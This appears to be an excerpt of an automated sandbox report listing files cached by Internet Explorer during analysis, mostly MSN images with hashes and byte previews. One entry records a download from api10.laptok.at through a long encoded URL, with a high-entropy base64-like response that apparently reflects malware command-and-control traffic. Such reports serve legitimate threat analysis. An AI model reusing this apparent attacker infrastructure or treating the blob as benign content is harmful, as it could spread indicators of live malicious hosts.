                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):7871
                                                                                Entropy (8bit):7.925642446695778
                                                                                Encrypted:false
                                                                                SSDEEP:192:BCse2DfHgfl9VuTgWZTAOwSejDibY3upHBIOIYMGG9:kslkDuT3Q33iE3Exld0
                                                                                MD5:8CE0A532C34806CB8D5F75E7E617B1DF
                                                                                SHA1:3D6462E3FA2622939B99B3917BAB2B08B2079E6F
                                                                                SHA-256:4A0634EEA60A9189B2196479A6466AA0DEFFA38A7F9341B7EA039707AF26FB39
                                                                                SHA-512:46A616CDBA7A3117BF809D7C63D78B6FF345C9F4D0747DEC5D69389DC6B150704D77D633E333717B815A798DAF73689A74F6D4DBFC4DC7E2D32ACCD9B81E848D
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHG2q.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..(.... LR..n(.;.b..J........4.(.......h...Z(...QKE..QHT.Z1@.1.i.......HS.U.Rm.p+l.8...O..e..*Pi....)......ih.h...1F)h.........(.sE...)h...3E-......Q.)q@.(..B)f8..k..u....-..u...UM].Xl,...v.o....p..Q...f.4..)..4...fh..?4..y...$.-0.vi.......E.P..P)h.1T.k.,l....w..A.W.9.K....Q..L.kB..%tS.....y...k..kB..).E.Lr.DN.>.....a.J.S..........."..y..)Km...+........K.$g.3}.>.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB1dHGk5[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):4407
                                                                                Entropy (8bit):7.770640540434376
                                                                                Encrypted:false
                                                                                SSDEEP:96:xGAaEgAjI7etObapitjpFJep1ghSKrjb+JvtcLDzjz5GTV3lBLf:xCVAEytOOpKOPKrj0vanzPgV1BL
                                                                                MD5:50FC998188EE12F9C27D1F3EEF922A9A
                                                                                SHA1:F4BD061A269AA56CD966026763B4DC29AE7A3120
                                                                                SHA-256:0BAB4D055372136E1440543C5C5F340F6D4DCC6A7B4F301BE6A7FBAE620AD7C8
                                                                                SHA-512:0A6C864CE6F11AC65D82104458210F42E93591BD241B3DE3B4845BF407BDB478866231ECC9E1CC58017EB670F40A0E5387B5C1C4F013DB5F816AD0A01C89D220
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHGk5.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                Preview: ......JFIF.....H.H.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...(...(...(...(...(...(...(...(...(..#...X.{..8.e.......C.a...7... .....+.......0.........I.t..z.k.Tw.;)a.W....F..5..~.+..[6>*..Xu........x..*.4xh=.}.h..*>:.`i..:e.v...%.B.S..<.......o..yl...tn..k....h.z.4h......(...(...(...(...(...(...(...(..:...~.wv...LW..q..W...^U..r.o.~..L..t..$.;$.I$...E..z.J...QK....1...,....D..9..}.Z.N..B-"X..FI......\..m-.={#
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB1dHJnR[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):9844
                                                                                Entropy (8bit):7.901878556459333
                                                                                Encrypted:false
                                                                                SSDEEP:192:BYlclzERgZTZ6DmGNjgn8cnvRgeqwSgM2RvjXlpvsTVYO5Rnxhu:e+9ERDpTcvueqw9MRFxhu
                                                                                MD5:C5BB1EC54E892B0A3C0636E48BC636C1
                                                                                SHA1:08FB501FDD523F63A0F1657954549AD38E78A12C
                                                                                SHA-256:B3252D60E3D519718211764EBD5B4042A2798C10D7BA3FC88A5C6C52B60E2D22
                                                                                SHA-512:E78EC4098FE4C3A56FFD107CEF35EC98097D1A22B3C4EAFE44F91AF3514E8A58133CF14B2A59930A6317013892F5538A5A248C1BD3BBB3731449981FA63505DB
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHJnR.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg&x=2179&y=878
                                                                                Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..QR..(.TP!.*U..."..r...h."..P).R.O....x..O...S. .....).8P.J(...R.E...Q@.E.P.E.P..E...QE.......R.P.IKE.%%-%.%%:....R.@...E1EJ...QR(.......O...x...S....@...H)..R.AN.....K@...Q@.E.P..E..R.^...iJE....',.../V...R.8....x.(..H..tx.Wv..3...Y..].e&...U...=i\,z.-r.....$..[.<}.r+..x.b..".7B)..ii(.B.E........(........CKHh.(....T.).*E...*@).).P....M..(..).8P..(...@.).).....P.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB1dHVao[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):8400
                                                                                Entropy (8bit):7.935113865096499
                                                                                Encrypted:false
                                                                                SSDEEP:192:BC0Ovu8+y8jCgLnFlAbiE0U1fQ4gBDMQgElUTG5CHACTcdeLTd04:k0OGby8eWn0B0UC4gBYQFoG5CkIV04
                                                                                MD5:39000CC1B36332AE92FA84430C53BC57
                                                                                SHA1:21AE752262D2A01E84A3119F57FCFFA06E26DE9E
                                                                                SHA-256:FAF169AC3F0A605AF3DFFE64A8C83EC0E69F1E0F8E4D5D6722F5D9B522711189
                                                                                SHA-512:1B35FF106D592D76D261BD422D85307C64F46D37EE58D9D296ABAC36876EC800C90FF3566E79BAF36CB098F7B5CC9FAB488A58FE1D121BFA6ADC497BA2A6069A
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHVao.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=751&y=181
                                                                                Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......_....~U..c....:....h.|..^\@........[.UA..984.Q..~....E..I....~.H.....jA>IT..!4i.M...E>."RR.@.IKE.%%-.....J`%.......P.i).....RP.h.... X..*.|..*8....e..y...#..J........J....sc.hd(.eP.G..<Zl. -(.;.I.RElw...V.....W+.l1..h..1RR.Z..IKE.%.QLBQKI@.E-%.%........*...:.YW>".m../cf....T..Ed...L.$Ep....sVN.c..c'...\.....o......IN4....l......~...HP.K.ARG..15..F.5...H.>
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB1dHhCC[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):59008
                                                                                Entropy (8bit):7.9730265166478
                                                                                Encrypted:false
                                                                                SSDEEP:1536:7aJ3lw1qv1k3oyJwM+sYjSfIbT6uOphCnydPptmJhTrf4tMmeDTZ0:IwEvwOM+dO2IOsptmJpXdN0
                                                                                MD5:E7F47955A5668C938A88F73DEA0C591E
                                                                                SHA1:DB861310741590C3392C3BFB2B03D4DD7F0FAE80
                                                                                SHA-256:C731116447CD3B610FBA6817F47ABFF448110F2A5308DFA7B82D0673F2815020
                                                                                SHA-512:ADA3D75D6437D09791E9C8CA0E614656D31CE3A3FADAEAD8F94F9A848F0BC06DF8480B8857D19344E30EF43DD93EB914939B33EEB64263AA3C94B864E7EC4E87
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHhCC.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=907&y=1399
                                                                                Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....?N..*.R.*7J...S.{...,..S{5.P.\....}jX.=_I.....6.j....Y.PO.x...Z.{...o#;..jj:L..gE$.}..~U...2G..N...).6.......k......!..zzW.x.M....6.,.C#o.kg.v..v.n..s3O.}>.+..G..*.2..Y.s..2sV..>.L.Ho.x%d....:r?..Gq..Z.b.}Z.)YR7........{.[K./.5==.2H...V|*.....'.........2..^..h..<.c..-w\]/...>P2.... ..$ya.....;is.....k.<q......tO.k:...[..h......N..TX,......K.T.{.I.....O..
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB1dHj30[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):2609
                                                                                Entropy (8bit):7.81053494692097
                                                                                Encrypted:false
                                                                                SSDEEP:48:BGpuERAHNnsP5Xd76zOtcumL/TJsf2QA/QFGPlG+DTswUviMmFf5gwACsRCo:BGAE2NsP5A7uue2zQguaM4ACno
                                                                                MD5:646C60016F1ACB2FE5B474330185277F
                                                                                SHA1:7FC10CC5F3C272B2620CFD027A4CE1DC62BF45A4
                                                                                SHA-256:6C5DD98966B6A6451B01FCB65F5CE82C4D8EA23278AB412DCC227246AAF5F5E1
                                                                                SHA-512:34D01C1F87071E374E8D4A08884B7334D07CA982DBDDF39BEC31D826149155CC798D61230AF06333C4B6D7E465AAB56DF8FDF5F0DA2EDEA4DC401D1A324F4BE5
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHj30.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Q%.y.I9f..F.._o.&.%.L..&..1.......T..P......wFJ`rwq...c....%.e......W..;g=....t2.V.)m&.J.F.]....\....g...<..nK'...{.c.s.m..,.E...p.$`q.c.....Ex...H.....Qg ..bP.^... ..........M...^].I.....&...A....@.n.q...Ukfx..L...T..z{.V.H...bY.P.(.[..Q.c...j......<....?L.5h.adDl.19Q..N@.]DR.........}9)+.&f.%y|...;...AW..Y.....{r..?.;$....I-.q....x...#.M./ g..>.....s@.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB1dHwGP[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):1426
                                                                                Entropy (8bit):7.61140107642463
                                                                                Encrypted:false
                                                                                SSDEEP:24:BI/XAo0XxDuLHeOWXG4OZ7DAJuLHenX34h7dfIPEodGWrgoKp5pzU/p:BGpuERAWfIPEqGvdpHzUB
                                                                                MD5:A87FCE7B79D63F958EE110D7A83BC2C4
                                                                                SHA1:4DB455BE36157AAE6EE10D29E8CC575DB9340B25
                                                                                SHA-256:6F9B477B6AD2F85263A67579879AAC8324F77F53C1BF754C314302E5354C21F7
                                                                                SHA-512:387316FC437D3FE27D03EBE5E822102FD02859BBBAC581D4A0CC8DB11D66C60876D0A568569637E1C6CFA45F3A7DE4C45A26005E71BCDC4E4B2A8560D5110954
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHwGP.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                Preview: ......JFIF.....`.`.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......K.d.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..0..Q..F.z.9..z.o&..jp....>sR...H2.4Qf0hl,A'AI.K2`Tq.iu+....x.V.k..N...U..o1-......?R.ob....s....#.........R.S.S..;Wj.##..Oa..L.)qE!..IK..;...zS...@..i...Hdrp.B.%V.9.,.({.$..*._....-m^i>.......Y...wt.=K.]...wQ.U$W.qu...+...x.7.....G....G.w.2M>.3H..-.zg.i.=..Mj.Y...K.........n.z..yL..V..NE1lm<.2..........*..R..*..c..h...&I...... ..s.3..\....H.........P.i.Uj..
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB1dHxqE[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 300x250, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):13828
                                                                                Entropy (8bit):7.923487582568081
                                                                                Encrypted:false
                                                                                SSDEEP:192:BbTcilaMgGyzerzB5I0K9QeioHWYb0Xrk5kMJtBvtOnb52qPnvLamiAOmmQTV5:ZraJzerzBHK9QgD0XrV2Bwnb5XvmxoV5
                                                                                MD5:DBA78C48EA6D6CC9879CE06BAE974351
                                                                                SHA1:BD67B235ED1AE24191E91521B67B324415584590
                                                                                SHA-256:6F38A166D9DB13D34D1A24025A1A881FC1E4350A4268654D6F984796215CED12
                                                                                SHA-512:484DFC7EB1DC1DE2A4D83038C2C91F3DC04EAF53865EE7FD84FF2BA1A3DF798581D2161DA1D38504E38D5C9D5E0AC7896B7443B71CAAB2E31A53C085909C62AD
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHxqE.img?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jpg&x=650&y=434
                                                                                Preview: ......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO........,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....1....8..=}...=..{t..N.r...>...T.,....f........[.....\S....<.w....[.V..sUn-...q.zT.. ..|.Tt|....`.:T..z...............o+Sd.>.D...|..6.....M.H$F....tTef..j..7.........H.G]JO..?......H.QI..y.^i.?.~u..6Z...W....%...j&...[..!...Msh?...n.{I....8. .......S.N.=/...+E...............+T........{?..K.....?.o-........7.........UrH?.......iF..................Q{....
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BB1dI7Wd[1].jpg
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                Category:downloaded
                                                                                Size (bytes):8703
                                                                                Entropy (8bit):7.854263285778846
                                                                                Encrypted:false
                                                                                SSDEEP:192:BYOQHoxNLt8fEBe8qHmb4ZMph0NkQdWDhZVzH8kjl0:eOIWLtP08qGQMph0W9D9zH8kK
                                                                                MD5:1DC4E26F46296E53A12B4BD9D8C917F0
                                                                                SHA1:7DBEF06ACBB84FDA194B52CD63B6811E1B2925EE
                                                                                SHA-256:19BFCD1F9D7371CFA501157AF679D8F434093CF77AD0B868C68127331B199A61
                                                                                SHA-512:0CA22252B9AC6C6BC891E1F7702B0B8282E854F7BFFD8902282905A4C6716ADCCB8DE7AC3A08B7FE94C224B80CE9B6FF747E2B7A9D1BB7568EBE102AB633A91F
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dI7Wd.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..(...E...+......:.\.nxr.C$.......JN....@:.;.|..5B}xA'..L.rs.).Z.t9..k.H.).V.CS........~.=:...QP..S.MjAv......=M.SZ...:....m.q.k..;..:..cb.9.I."....Z.\...u.Ya.Q..Rfd..q\..4s...y....=k..2*....a...'.r..ec.F+[_..zv.....Oj..u...)&...Q.u....1K.1@..)qF(.....P.QK.1@....b...J)qF(..)qF(.(..b...Z(...P(.R.*H.idX.e.......'Nk...8........8..x.*...Oo.......6.J..>.k..A^;....
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBUE92F[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):708
                                                                                Entropy (8bit):7.5635226749074205
                                                                                Encrypted:false
                                                                                SSDEEP:12:6v/78/gMGkt+fwrs8vYfbooyBf1e7XKH5bp6z0w6TDy9xB0IIDtqf/bU9Fqj1yfd:XGVw9oiNH5pbPDy9xmju/AXEyfYFW
                                                                                MD5:770E05618413895818A5CE7582D88CBA
                                                                                SHA1:EF83CE65E53166056B644FFC13AF981B64C71617
                                                                                SHA-256:EEC4AB26140F5AEA299E1D5D5F0181DDC6B4AC2B2B54A7EE9E7BA6E0A4B4667D
                                                                                SHA-512:B01D7D84339D5E1B3958E82F7679AFD784CE1323938ECA7C313826A72F0E4EE92BD98691F30B735A6544543107B5F5944308764B45DB8DE06BE699CA51FF7653
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBUE92F.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs...%...%.IR$....YIDAT8OM..LA...~..."".q...X........+"q@...A...&H..H...D.6..p.X".......z.d.f*......rg.?.....v7.....\.{eE..LB.rq.v.J.:*tv...w.....g../.ou.]7........B..{..|.S.......^....y......c.T.L...(.dA..9.}.....5w.N......>z.<..:.wq.-......T..w.8-.>P...Ke....!7L......I...?.mq.t....?..'.(....'j.......L<)L%........^..<..=M...rR.A4..gh...iX@co..I2....`9}...E.O.i?..j5.|$.m..-5....Z.bl...E......'MX[.M.....s...e..7..u<L.k.@c......k..zzV....O..........e.,.5.+%.,,........!.....y;..d.mK..v.J.C..0G:w...O.N...........J....|....b:L=...f:@6T[...F..t......x.....F.w..3....@.>.......!..bF.V..?u.b&q.......IEND.B`.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\BBnYSFZ[1].png
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                Category:downloaded
                                                                                Size (bytes):560
                                                                                Entropy (8bit):7.425950711006173
                                                                                Encrypted:false
                                                                                SSDEEP:12:6v/78/+m8H/Ji+Vncvt7xBkVqZ5F8FFl4hzuegQZ+26gkalFUx:6H/xVA7BkQZL8OhzueD+ikalY
                                                                                MD5:CA188779452FF7790C6D312829EEE284
                                                                                SHA1:076DF7DE6D49A434BBCB5D88B88468255A739F53
                                                                                SHA-256:D30AB7B54AA074DE5E221FE11531FD7528D9EEEAA870A3551F36CB652821292F
                                                                                SHA-512:2CA81A25769BFB642A0BFAB8F473C034BFD122C4A44E5452D79EC9DC9E483869256500E266CE26302810690374BF36E838511C38F5A36A2BF71ACF5445AA2436
                                                                                Malicious:false
                                                                                IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........o.d....IDAT8O.S.KbQ..zf.j...?@...........J.......z..EA3P....AH...Y..3......|6.6}......{..n. ...b..........".h4b.z.&.p8`...:..Lc....*u:......D...i$.)..pL.^..dB.T....#.f3...8.N.b1.B!.\...n..a...a.Z........J%.x<....|..b.h4.`0.EQP.. v.q....f.9.H`8..\...j.N&...X,2...<.B.v[.(.NS6..|>..n4...2.57.*.......f.Q&.a-..v..z..{P.V......>k.J...ri..,.W.+.......5:.W.t...i.....g....\.t..8.w...:......0....%~...F.F.o".'rx...b..vp....b.l.Pa.W.r..aK..9&...>.5...`..'W......IEND.B`.
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\CFI[1].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                Category:downloaded
                                                                                Size (bytes):339392
                                                                                Entropy (8bit):5.999967656351339
                                                                                Encrypted:false
                                                                                SSDEEP:6144:cDJl443S9YbS47Fk3Zsv12tXBQWgy01CGFSpjYC5osGAEcJMizvDupzStPX56:cB35u8u6vMFgy0cWUGlMv65oXM
                                                                                MD5:415DBB7F17A00913790F8E99ADBB9D93
                                                                                SHA1:C7D1A1B88A46A1E65B109257BFFFB5259900AF17
                                                                                SHA-256:3A7B725B6B273BFCFDBEC5A06868562AD848034EFBA247BE5739858768FC3B0A
                                                                                SHA-512:39C6EB2B71D0D68E0AEAC7DF2CCBDA743633A94895D90DC2569D866F1490A33200BEB29AC31573F2814E78487FF6FC50D492AC049213C8542ACE6BF23F24D048
                                                                                Malicious:false
                                                                                IE Cache URL:http://api10.laptok.at/api1/ACRDYIo3vDDkE8nBO7rZ_2F/RKqyjTnG2z/bw24fKr8FPY8iC_2F/NOd8pP1qrd_2/B0zRVNFer70/12v4aw2Bat1oWp/EdxqaQHccPmd48WBI_2Fh/ZsZf5oFs1F5WVpMV/Aql6isAZLQXMGYV/uCpbF51_2FaHU68PIY/HN1L8Jeq6/71Of32mfKV_2FEsbc40d/blSVHi4z_2F2u7ZVT2S/LNeMbeXi5H54yUd71Yke04/YvCLg_2BV_2FO/HHmC2v0g/tP9YiJq20QZR4sjpPzGs48R/leCqM3qCaD/cvMCdxcgqejP1dFql/2a73eaCZuJLy/90fQzPpEVBC/OzDkRB7t1Aba9y/CFI
                                                                                Preview: 6jOtPWjpJsKgG9IhgDi2XnSCJeSPxONX1nV8WY+GCWFWyqgjjf6aBHZ4Gm39WG35NlAjlSFMwsnGPoXAWLoM/VLRnXdPawnt6pIAayjW023ZgrADWj9Fjr/hEsQCUe4YN7RczMhFfFBSJE/eeaHpbpQOy3XXJLCECMM3JawVyKI5iDJIFdt8LR0d0hT19sg73Ioo/OjZ0sudP5iixOsSUCP++ITfM5DX+ewXXNSgm3azZl1EqLWpD9YZWm1PgJLqtij73+/eCtHQdmU+FFqUDQ3Xnpks7WjfKicoK3vhxYzfuwHE3AUCMVgzwFEzknjCe9uIblPLxqxWMU6JLDpeSTbcyxbKggkrp+O89ZEF+bScp5n9Jc1fsIkM9Ncw15Qt0YTxV/MgV22XDxC1hTWXMQuNHwUzeqTfFvh26+BNxM/PwN5yOJhezaNZpQp7q9tDSNskdDTftyq4K8ofKgCZv15zm+l5u7/Mcd5nxwUPW5WsXa7ib9QPplhF063avjRaAFWVpamPBkQP1N1SoIbNNFsgzHlH79gPaBwu3X1dEAe3blRumLGYr8OAsEwvbOVxJvLh6q753BMvZjXGdTk+9dFyubDa1jpLDtD176vNa++TwgurI3dCIbwwGkxT+S7BtkCz2UsVl8/oxv+pyVqTuFWJNBVsjmMBTH+o6ixzyxY4kCoQ14J3W6MW8QSctnAS2US5UlzBdCiE7HQNno7026e8F26RpsiAmcjtEeqQ38jAnTbDfOm/u+sBYDbOeAwpBjLG/DryeM3Qi9w7O6LujG5iaCPrVUxgHhW5/6oMR8sdtLTYSw3ERvJPdZq/pt+pOqSVnTDfixNvt8OAYhiEKwuSyGf5nQHyRruX1Tvy+NIGP/+PTpz8rcqR3pPUYDDDZA7zg4T1I/Y2vuZ1crSAZAJy6aXwJD0XSAvEzXw3OBHfnIBt14DTppquKuqVJanzB0revx3N8H8GUUIncQil4aNk4MPGk5P4qJOiPkQT
                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\auction[1].htm
                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                File Type:HTML document, ASCII text, with very long lines
                                                                                Category:downloaded
                                                                                Size (bytes):26067
                                                                                Entropy (8bit):5.668270399886674
                                                                                Encrypted:false
                                                                                SSDEEP:384:m8RpcDPs9pc58u81/esxF4wyMNH87hpJ+bN2ICY5o7kS7i0EeJkXYGiyFpproBIw:m1tWZ9hdb7jzWP3I8X
                                                                                MD5:0304E614E92FEDCDFEC9C3345DD15969
                                                                                SHA1:0635FDABF6151F5FF75E5210146AED96710E9214
                                                                                SHA-256:26862A95B23853E609F7017B1A21C08E2234B837BFE2B734F83DFE12E75A87A9
                                                                                SHA-512:B0C95A8D4F23FE5F9A0A02EEEB0560EC8989CBC99D23B9A9ABAA392643F3A90E3F679F1C17023B89AEFE90C5B47F0B5C64A677B74A04FFC2240E1CFD2E32EB27
                                                                                Malicious:false
                                                                                IE Cache URL:https://srtb.msn.com/auction?a=de-ch&b=c99b6d8737ec42509dd00479fdb8ff89&c=MSN&d=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&e=HP&f=0&g=homepage&h=&j=0&k=0&l=&m=0&n=infopane%7C3%2C11%2C15&o=&p=init&q=&r=&s=1&t=&u=0&v=0&x=&w=&_=1613433453534
